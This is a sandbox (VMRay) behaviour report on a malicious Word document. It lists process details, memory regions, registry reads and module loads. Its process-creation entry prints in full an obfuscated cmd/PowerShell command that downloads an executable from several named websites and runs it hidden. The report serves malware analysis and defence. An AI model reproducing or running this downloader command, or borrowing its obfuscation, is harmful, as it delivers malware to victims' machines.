Malicious Microsoft Word Document (Analysis Date 2017-11-28) | Grouped Behavior
Try VMRay Analyzer
Monitored Processes
Behavior Information - Grouped by Category
Process #1: winword.exe
(Host: 159, Network: 0)
+
Information Value
ID #1
File Name c:\program files\microsoft office\root\office16\winword.exe
Command Line "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:08, Reason: Analysis Target
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:02:15
OS Process Information
+
Information Value
PID 0x9d4
Parent PID 0x584 (c:\windows\explorer.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x A58
0x A54
0x A50
0x A48
0x A38
0x A34
0x A10
0x 9EC
0x 9E8
0x 9E0
0x 9DC
0x 9D8
0x A74
0x A78
0x A7C
0x A80
0x A84
0x A88
0x AAC
0x ACC
0x AD8
0x 8A0
0x 8B0
0x 8F4
0x 910
Region
+
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000020000 0x00020000 0x00020fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000040000 0x00040000 0x00043fff Pagefile Backed Memory Readable False False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c0fff Pagefile Backed Memory Readable False False False
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable False False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable False False False
private_0x00000000000f0000 0x000f0000 0x001effff Private Memory Readable, Writable False False False
pagefile_0x00000000001f0000 0x001f0000 0x001f0fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000000200000 0x00200000 0x00206fff Pagefile Backed Memory Readable False False False
private_0x0000000000210000 0x00210000 0x0030ffff Private Memory Readable, Writable False False False
private_0x0000000000310000 0x00310000 0x0040ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000410000 0x00410000 0x00411fff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000000420000 0x00420000 0x00420fff Private Memory Readable, Writable False False False
private_0x0000000000430000 0x00430000 0x00430fff Private Memory Readable, Writable False False False
pagefile_0x0000000000440000 0x00440000 0x00441fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000450000 0x00450000 0x00451fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000460000 0x00460000 0x00462fff Pagefile Backed Memory Readable False False False
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory Readable, Writable False False False
pagefile_0x0000000000480000 0x00480000 0x00607fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000000610000 0x00610000 0x00790fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000007a0000 0x007a0000 0x01b9ffff Pagefile Backed Memory Readable False False False
sortdefault.nls 0x01ba0000 0x01e6efff Memory Mapped File Readable False False False
pagefile_0x0000000001e70000 0x01e70000 0x02262fff Pagefile Backed Memory Readable False False False
private_0x0000000002270000 0x02270000 0x0236ffff Private Memory Readable, Writable False False False
private_0x0000000002370000 0x02370000 0x0237ffff Private Memory - False False False
pagefile_0x0000000002380000 0x02380000 0x02382fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002390000 0x02390000 0x02392fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023a0000 0x023a0000 0x023a2fff Pagefile Backed Memory Readable False False False
pagefile_0x00000000023b0000 0x023b0000 0x023b2fff Pagefile Backed Memory Readable False False False
private_0x00000000023c0000 0x023c0000 0x023fffff Private Memory Readable, Writable False False False
private_0x0000000002410000 0x02410000 0x0241ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002420000 0x02420000 0x02421fff Pagefile Backed Memory Readable False False False
private_0x0000000002470000 0x02470000 0x024effff Private Memory Readable, Writable False False False
pagefile_0x00000000024f0000 0x024f0000 0x025cefff Pagefile Backed Memory Readable False False False
kernelbase.dll.mui 0x025d0000 0x0268ffff Memory Mapped File Readable, Writable False False False
private_0x0000000002690000 0x02690000 0x0278ffff Private Memory Readable, Writable False False False
private_0x00000000027a0000 0x027a0000 0x027aefff Private Memory Readable, Writable True True False
private_0x00000000027f0000 0x027f0000 0x027f2fff Private Memory Readable, Writable True True False
private_0x0000000002830000 0x02830000 0x02830fff Private Memory Readable, Writable False False False
pagefile_0x0000000002840000 0x02840000 0x02844fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002850000 0x02850000 0x02850fff Pagefile Backed Memory Readable False False False
pagefile_0x0000000002860000 0x02860000 0x02860fff Pagefile Backed Memory Readable False False False
private_0x0000000002870000 0x02870000 0x02870fff Private Memory Readable, Writable False False False
pagefile_0x0000000002880000 0x02880000 0x02881fff Pagefile Backed Memory Readable False False False
msxml6r.dll 0x02890000 0x02890fff Memory Mapped File Readable False False False
private_0x00000000028a0000 0x028a0000 0x028affff Private Memory Readable, Writable False False False
cfgmgr32.dll 0x028b0000 0x028e5fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000028f0000 0x028f0000 0x029effff Private Memory Readable, Writable False False False
{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000013.db 0x029f0000 0x02a14fff Memory Mapped File Readable False False False
private_0x0000000002a20000 0x02a20000 0x02b1ffff Private Memory Readable, Writable False False False
private_0x0000000002b20000 0x02b20000 0x02d1ffff Private Memory Readable, Writable False False False
pagefile_0x0000000002d20000 0x02d20000 0x02d20fff Pagefile Backed Memory Readable, Writable False False False
pagefile_0x0000000002d30000 0x02d30000 0x02d31fff Pagefile Backed Memory Readable False False False
private_0x0000000002d40000 0x02d40000 0x02d40fff Private Memory Readable, Writable False False False
c_1255.nls 0x02d50000 0x02d60fff Memory Mapped File Readable False False False
private_0x0000000002d70000 0x02d70000 0x02deffff Private Memory Readable, Writable False False False
private_0x0000000002df0000 0x02df0000 0x02e0ffff Private Memory - False False False
onbttnwd.dll 0x02e10000 0x02e14fff Memory Mapped File Readable False False False
private_0x0000000002e20000 0x02e20000 0x02e3efff Private Memory Readable, Writable False False False
private_0x0000000002e40000 0x02e40000 0x02e5ffff Private Memory - False False False
private_0x0000000002e60000 0x02e60000 0x02f5ffff Private Memory Readable, Writable False False False
private_0x0000000002f60000 0x02f60000 0x02f7ffff Private Memory - False False False
private_0x0000000002f80000 0x02f80000 0x02f9ffff Private Memory - False False False
stdole2.tlb 0x02fa0000 0x02fa3fff Memory Mapped File Readable False False False
private_0x0000000002fc0000 0x02fc0000 0x030bffff Private Memory Readable, Writable False False False
private_0x00000000030c0000 0x030c0000 0x030defff Private Memory Readable, Writable True True False
private_0x00000000030e0000 0x030e0000 0x031dffff Private Memory Readable, Writable False False False
segoeui.ttf 0x031e0000 0x0325efff Memory Mapped File Readable False False False
private_0x0000000003270000 0x03270000 0x0327ffff Private Memory Readable, Writable False False False
private_0x00000000032a0000 0x032a0000 0x0339ffff Private Memory Readable, Writable False False False
pagefile_0x00000000033a0000 0x033a0000 0x0379ffff Pagefile Backed Memory Readable False False False
staticcache.dat 0x037a0000 0x040cffff Memory Mapped File Readable False False False
private_0x0000000004100000 0x04100000 0x0411dfff Private Memory Readable, Writable True True False
private_0x0000000004120000 0x04120000 0x0413efff Private Memory Readable, Writable True True False
private_0x0000000004150000 0x04150000 0x0416efff Private Memory Readable, Writable True True False
private_0x0000000004180000 0x04180000 0x0419efff Private Memory Readable, Writable True True False
private_0x00000000041a0000 0x041a0000 0x0429ffff Private Memory Readable, Writable False False False
private_0x0000000004350000 0x04350000 0x0436efff Private Memory Readable, Writable True True False
private_0x0000000004370000 0x04370000 0x0437ffff Private Memory Readable, Writable False False False
private_0x0000000004380000 0x04380000 0x0447ffff Private Memory Readable, Writable False False False
private_0x0000000004480000 0x04480000 0x0457ffff Private Memory Readable, Writable False False False
private_0x0000000004580000 0x04580000 0x0459efff Private Memory Readable, Writable True True False
private_0x00000000045a0000 0x045a0000 0x045affff Private Memory Readable, Writable False False False
private_0x0000000004660000 0x04660000 0x046dffff Private Memory Readable, Writable, Executable False False False
pagefile_0x00000000046e0000 0x046e0000 0x04edffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000004ee0000 0x04ee0000 0x04f00fff Private Memory Readable, Writable True True False
private_0x0000000004f10000 0x04f10000 0x04f2efff Private Memory Readable, Writable True True False
private_0x0000000004f40000 0x04f40000 0x04fbffff Private Memory Readable, Writable False False False
private_0x0000000004fc0000 0x04fc0000 0x04fddfff Private Memory Readable, Writable True True False
private_0x0000000004ff0000 0x04ff0000 0x050effff Private Memory Readable, Writable False False False
private_0x0000000005110000 0x05110000 0x0512efff Private Memory Readable, Writable True True False
private_0x00000000051c0000 0x051c0000 0x052bffff Private Memory Readable, Writable False False False
private_0x00000000052c0000 0x052c0000 0x056bffff Private Memory Readable, Writable False False False
private_0x00000000056e0000 0x056e0000 0x057dffff Private Memory Readable, Writable False False False
pagefile_0x00000000057e0000 0x057e0000 0x067dffff Pagefile Backed Memory Readable, Writable False False False
private_0x0000000006990000 0x06990000 0x06a0ffff Private Memory Readable, Writable False False False
private_0x0000000006a10000 0x06a10000 0x06b0ffff Private Memory Readable, Writable False False False
private_0x0000000006b70000 0x06b70000 0x06beffff Private Memory Readable, Writable False False False
private_0x0000000006bf0000 0x06bf0000 0x06feffff Private Memory Readable, Writable False False False
private_0x0000000007000000 0x07000000 0x070fffff Private Memory Readable, Writable False False False
private_0x0000000007270000 0x07270000 0x072effff Private Memory Readable, Writable False False False
private_0x00000000072f0000 0x072f0000 0x07aeffff Private Memory Readable, Writable False False False
private_0x0000000007af0000 0x07af0000 0x07ef0fff Private Memory Readable, Writable False False False
private_0x0000000007f00000 0x07f00000 0x08300fff Private Memory Readable, Writable False False False
private_0x0000000008310000 0x08310000 0x08710fff Private Memory Readable, Writable False False False
private_0x0000000008720000 0x08720000 0x0891ffff Private Memory Readable, Writable False False False
private_0x0000000008920000 0x08920000 0x08ddffff Private Memory Readable, Writable False False False
private_0x0000000008de0000 0x08de0000 0x091dffff Private Memory Readable, Writable False False False
private_0x000000000a4b0000 0x0a4b0000 0x0a961fff Private Memory Readable, Writable True True False
private_0x0000000036e80000 0x36e80000 0x36e8ffff Private Memory Readable, Writable, Executable False False False
private_0x000000006fff0000 0x6fff0000 0x6fffffff Private Memory Readable, Writable, Executable False False False
osppc.dll 0x74490000 0x744c2fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x76e70000 0x76f69fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x76f70000 0x7708efff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x77260000 0x77266fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable False False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable False False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable False False False
winword.exe 0x13ffb0000 0x14018afff Memory Mapped File Readable, Writable, Executable False False False
private_0x000007febe960000 0x7febe960000 0x7febe96ffff Private Memory Readable, Writable, Executable False False False
onbttnwd.dll 0x7fee3a20000 0x7fee3a59fff Memory Mapped File Readable, Writable, Executable False False False
chart.dll 0x7fee3a60000 0x7fee4558fff Memory Mapped File Readable, Writable, Executable False False False
riched20.dll 0x7fee4560000 0x7fee4782fff Memory Mapped File Readable, Writable, Executable False False False
mscoreei.dll 0x7fee48c0000 0x7fee4958fff Memory Mapped File Readable, Writable, Executable False False False
dwrite.dll 0x7fee49d0000 0x7fee4b4dfff Memory Mapped File Readable, Writable, Executable False False False
d3d10warp.dll 0x7fee4b50000 0x7fee4d1ffff Memory Mapped File Readable, Writable, Executable False False False
msptls.dll 0x7fee4d20000 0x7fee4e8ffff Memory Mapped File Readable, Writable, Executable False False False
msointl.dll 0x7fee4e90000 0x7fee500afff Memory Mapped File Readable, Writable, Executable False False False
wwintl.dll 0x7fee5010000 0x7fee50cbfff Memory Mapped File Readable, Writable, Executable False False False
msores.dll 0x7fee50d0000 0x7fee9f0efff Memory Mapped File Readable, Writable, Executable False False False
mso99lres.dll 0x7fee9f10000 0x7feea830fff Memory Mapped File Readable, Writable, Executable False False False
mso40uires.dll 0x7feea840000 0x7feeab47fff Memory Mapped File Readable, Writable, Executable False False False
mso.dll 0x7feeab50000 0x7feebe2bfff Memory Mapped File Readable, Writable, Executable False False False
mso99lwin32client.dll 0x7feebe30000 0x7feec5fbfff Memory Mapped File Readable, Writable, Executable False False False
mso40uiwin32client.dll 0x7feec600000 0x7feeceeafff Memory Mapped File Readable, Writable, Executable False False False
mso30win32client.dll 0x7feecef0000 0x7feed367fff Memory Mapped File Readable, Writable, Executable False False False
mso20win32client.dll 0x7feed370000 0x7feed673fff Memory Mapped File Readable, Writable, Executable False False False
oart.dll 0x7feed680000 0x7feee7ebfff Memory Mapped File Readable, Writable, Executable False False False
d3d11.dll 0x7feee7f0000 0x7feee8b5fff Memory Mapped File Readable, Writable, Executable False False False
wwlib.dll 0x7feee8c0000 0x7fef0c5efff Memory Mapped File Readable, Writable, Executable False False False
mscoree.dll 0x7fef1100000 0x7fef116efff Memory Mapped File Readable, Writable, Executable False False False
sppc.dll 0x7fef1170000 0x7fef1196fff Memory Mapped File Readable, Writable, Executable False False False
mlang.dll 0x7fef11a0000 0x7fef11dafff Memory Mapped File Readable, Writable, Executable False False False
npmproxy.dll 0x7fef3780000 0x7fef378bfff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l1-2-0.dll 0x7fef3bb0000 0x7fef3bb2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-processthreads-l1-1-1.dll 0x7fef3bc0000 0x7fef3bc2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-synch-l1-2-0.dll 0x7fef3d90000 0x7fef3d92fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-localization-l1-2-0.dll 0x7fef3da0000 0x7fef3da2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-file-l2-1-0.dll 0x7fef3db0000 0x7fef3db2fff Memory Mapped File Readable, Writable, Executable False False False
api-ms-win-core-timezone-l1-1-0.dll 0x7fef3dc0000 0x7fef3dc2fff Memory Mapped File Readable, Writable, Executable False False False
ucrtbase.dll 0x7fef3dd0000 0x7fef3ec1fff Memory Mapped File Readable, Writable, Executable False False False
msimg32.dll 0x7fef3ed0000 0x7fef3ed6fff Memory Mapped File Readable, Writable, Executable False False False
c2r64.dll 0x7fef3ee0000 0x7fef4008fff Memory Mapped File Readable, Writable, Executable False False False
appvisvstream64.dll 0x7fef4010000 0x7fef4089fff Memory Mapped File Readable, Writable, Executable False False False
appvisvsubsystems64.dll 0x7fef4090000 0x7fef42c5fff Memory Mapped File Readable, Writable, Executable False False False
msxml6.dll 0x7fef4a60000 0x7fef4c51fff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x7fef4cf0000 0x7fef4d60fff Memory Mapped File Readable, Writable, Executable False False False
msointl30.dll 0x7fef5270000 0x7fef527efff Memory Mapped File Readable, Writable, Executable False False False
wbemsvc.dll 0x7fef5740000 0x7fef5753fff Memory Mapped File Readable, Writable, Executable False False False
wbemprox.dll 0x7fef5a40000 0x7fef5a4efff Memory Mapped File Readable, Writable, Executable False False False
ntdsapi.dll 0x7fef5a50000 0x7fef5a76fff Memory Mapped File Readable, Writable, Executable False False False
For performance reasons, the remaining 561 entries are omitted.
The remaining entries can be found in flog.txt.
Host Behavior
Registry (44)
+
Operation Key Additional Information Success Count Logfile
Create Key HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common - True 1
Fn
Open Key HKEY_CLASSES_ROOT\Licenses - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\409 - False 2
Fn
Open Key win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 - True 2
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64\win64 - True 1
Fn
Open Key HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0 - True 1
Fn
Read Value HKEY_CLASSES_ROOT\Licenses\8804558B-B773-11d1-BC3E-0000F87552E7 data = } False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = RequireDeclaration, data = 78, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = CompileOnDemand, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = NotifyUserBeforeStateLoss, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BackGroundCompile, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnAllErrors, data = 255, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\VBA\7.1\Common value_name = BreakOnServerErrors, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046}\8.7\0\win64 data = C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB True 2
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0\win64 data = C:\Windows\system32\stdole2.tlb True 1
Fn
Read Value HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.8\0\win64 data = C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020430-0000-0000-C000-000000000046} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52} - True 1
Fn
Enumerate Keys HKEY_CLASSES_ROOT\TypeLib\{00020905-0000-0000-C000-000000000046} - True 1
Fn
Process (1)
+
Operation Process Additional Information Success Count Logfile
Create CmD wMic wMic wMic wMic & %Co^m^S^p^Ec^% /V /c set %binkOHOTJcSMBkQ%=EINhmPkdO&&set %kiqjRiiiH%=owe^r^s&&set %zzwpVwCTCRDvTBu%=pOwoJiQoW&&set %CdjPuLtXi%=p&&set %GKZajcAqFZkRLZw%=NazJjhVlGSrXQvT&&set %QiiPPcnDM%=^he^l^l&&set %jiIZiKXbkZQMpuQ%=dipAbiiHEplZSHr&&!%CdjPuLtXi%!!%kiqjRiiiH%!!%QiiPPcnDM%! ".( $VeRbOsePReFEREncE.tOstRinG()[1,3]+'x'-jOin'') ( ('. ( ctVpshoME[4]+ctVPsHomE[34]+VnLXVnL) ( ((VnL((uxpeAbfruxp+uxpanuxp+uxpc =uxp+uxp '+'uxp+uxpnew-obVnL+VnL'+'uxp+uxp'+'jectu'+'xp+uxp Suxp+uxpysuxp+VnL+Vn'+'L'+'uxptem'+'.Netu'+'xp+uxp.Webuxp+uxpCuxp+uxplienuxp+uxpt;VnL+VnLeAbnuxp+u'+'xpsuxp'+'+uxpVnL+VnLadauxVnL+VnLp+uVnL+VnLxps'+'d =uxp+uxpVnL+VnL nuxp+'+'uxpeuxp+uxpw-objec'+'t VnL+VnLrandom;eAbbcd ='+' YMjuxpVnL+VnL+uxphttp://www.indpts.com/UVnL+VnLH'+'SD/,httpuxp+uxp://uxp+uxpwwwuxp+uxp.fingerfuxp+uxVnL+Vn'+'Lpun.co.uxp+uxpuk/npZVn'+'L+Vn'+'LdQQy/uxp+uxp,uxpVnL+VnL+uxphttp://www.r'+'uxp+uxpelicstone.uxp+uxpcouxp+uxpm/wuxpVnL+VnL+uxp'+'p-content/themes-suVnL+VnLspeVnL+V'+'nLcted/umuxp+uxpo'+'juxp+uxpp43uxp+uxp/uNssVnL+Vn'+'Luxp+uxpuwuxp+uxpHS/,http://www.wang'+'lb.topux'+'p+uxp/wp-conteuxp+'+'uxpnt/Td/,h'+'ttuxp+uxppuxp+uxp:uxp'+'+uxp//uxp+uxpwux'+'p+uxpww.uxp+uxpfr'+'iuxp+uxVnL+Vn'+'Lpgolitfabrikuxp+uxpen.VnL+VnLse/uxp+uxpzVnL+VnLpuxp+uxpy/YMj.Spuxp+uxplituxp+uxp(YMjVnL+VnL,Yuxp+uxpMj)uxp+VnL+VnLuxp;eAbk'+'VnL+VnLauxp+uxprapas =uxp+uxp u'+'xp+uxpeAVnL+VnLbuxp+uxpnsauxp+uxpdasd.nextuxp+uxp(1, 343245);eAuxp+uxpbhuxp+uxpua'+'s = uxp+uxpeAuxp'+'+uxpbVnL+VnLuxp+uxpenv:public + YMjuxp+uxpGW9YMu'+'xp+'+'uxpj +uVn'+'L+VnLxp+uxp eAbkarapuxp+uxpas + YMj.euxp+uxpxeYMj;uxp+uxpforeach(eAbabc in eAbbcuxVnL+VnLp+uxpd){tuxp+uxpr'+'yuxp+uxp{eAuxp+uxpbfruxp+uxpaVnL+'+'VnLnc.Downlo'+'adFile(e'+'uxp+uxpAbVnL+VnLabc.Tuxp+uxpoVnL+VnLuxp+uxpSuxp+uxptuxp+uxpring(uxp+VnL+VnLuxp),uxp+uxp euxpV'+'nL+VnL+uxpAbhuas);uxp+uxpInuxp+uxpvoke-ItemuxVnL+VnLp+uxp(eAbhVnL+VnLuas)uxp+uxp'+';break'+'VnL+VnL;}catch{write-host uxp+uxpeuxp+uxpAb_.Euxp+uxpxceptionuxVnL+V'+'nLp+uxpVnL+VnL.Messuxp+uxpag'+'e;}}VnL+VnLuxp)-REplaCE uxpGW9'+'uxp,[cHa'+'r]92-CREpLaCE ([c'+'Har]8'+'9+[cHar]77+[cHar]106),[cHar]39-CREpLaCE([cHVnL+VnLar]101+[cHar]6'+'5+[cHar]VnL+Vn'+'L98),[cHar]36) z3L .( 79JEnv:PubLic[13]+VnL+VnL79Jenv:PubLIC[5]+uxpXuxp)VnL) -rePlAce'+' VnLz3LVnL,[cHAR]124-rePlAce VnLuxpVnL,[cHAR]39 -cREpLaCe([c'+'HAR]55+[cHAR]57+[cHAR]74),[cHAR]36) ) ').repLacE('ctV','$').repLacE('VnL',[String][char]39) ) os_pid = 0xad0, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Module (83)
+
Operation Module Additional Information Success Count Logfile
Load C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x7fee3590000 True 1
Fn
Get Handle Unknown module name base_address = 0x7fef8cd0000 True 1
Fn
Get Handle C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBEUI.DLL base_address = 0x0 False 1
Fn
Get Handle c:\windows\system32\user32.dll base_address = 0x76e70000 True 1
Fn
Get Handle oleaut32.dll base_address = 0x7feff1c0000 True 1
Fn
Get Handle ole32.dll base_address = 0x7fefe810000 True 1
Fn
Get Filename - process_name = c:\program files\microsoft office\root\office16\winword.exe, file_name_orig = C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL, size = 260 True 2
Fn
Get Address Unknown module name function = MsiProvideQualifiedComponentA, address_out = 0x7fef8d53b3c True 1
Fn
Get Address Unknown module name function = MsiGetProductCodeA, address_out = 0x7fef8d4a13c True 1
Fn
Get Address Unknown module name function = MsiReinstallFeatureA, address_out = 0x7fef8d51618 True 1
Fn
Get Address Unknown module name function = MsiProvideComponentA, address_out = 0x7fef8d4f088 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetSystemMetrics, address_out = 0x76e894f0 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromWindow, address_out = 0x76e85f08 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromRect, address_out = 0x76e82b00 True 1
Fn
Get Address c:\windows\system32\user32.dll function = MonitorFromPoint, address_out = 0x76e7ab64 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayMonitors, address_out = 0x76e85c30 True 1
Fn
Get Address c:\windows\system32\user32.dll function = GetMonitorInfoA, address_out = 0x76e7a730 True 1
Fn
Get Address c:\windows\system32\user32.dll function = EnumDisplayDevicesA, address_out = 0x76e7a5b4 True 1
Fn
Get Address Unknown module name function = DispCallFunc, address_out = 0x7feff1c2270 True 1
Fn
Get Address Unknown module name function = LoadTypeLibEx, address_out = 0x7feff1ca550 True 1
Fn
Get Address Unknown module name function = UnRegisterTypeLib, address_out = 0x7feff2520d0 True 1
Fn
Get Address Unknown module name function = CreateTypeLib2, address_out = 0x7feff24dbd0 True 1
Fn
Get Address Unknown module name function = VarDateFromUdate, address_out = 0x7feff1c5c90 True 1
Fn
Get Address Unknown module name function = VarUdateFromDate, address_out = 0x7feff1c6330 True 1
Fn
Get Address Unknown module name function = GetAltMonthNames, address_out = 0x7feff1e66c0 True 1
Fn
Get Address Unknown module name function = VarNumFromParseNum, address_out = 0x7feff1c4710 True 1
Fn
Get Address Unknown module name function = VarParseNumFromStr, address_out = 0x7feff1c48f0 True 1
Fn
Get Address Unknown module name function = VarDecFromR4, address_out = 0x7feff1fb640 True 1
Fn
Get Address Unknown module name function = VarDecFromR8, address_out = 0x7feff1fb360 True 1
Fn
Get Address Unknown module name function = VarDecFromDate, address_out = 0x7feff202640 True 1
Fn
Get Address Unknown module name function = VarDecFromI4, address_out = 0x7feff1e58a0 True 1
Fn
Get Address Unknown module name function = VarDecFromCy, address_out = 0x7feff1e5820 True 1
Fn
Get Address Unknown module name function = VarR4FromDec, address_out = 0x7feff1faf20 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromTypeInfo, address_out = 0x7feff21a0c0 True 1
Fn
Get Address Unknown module name function = GetRecordInfoFromGuids, address_out = 0x7feff252160 True 1
Fn
Get Address Unknown module name function = SafeArrayGetRecordInfo, address_out = 0x7feff1e5af0 True 1
Fn
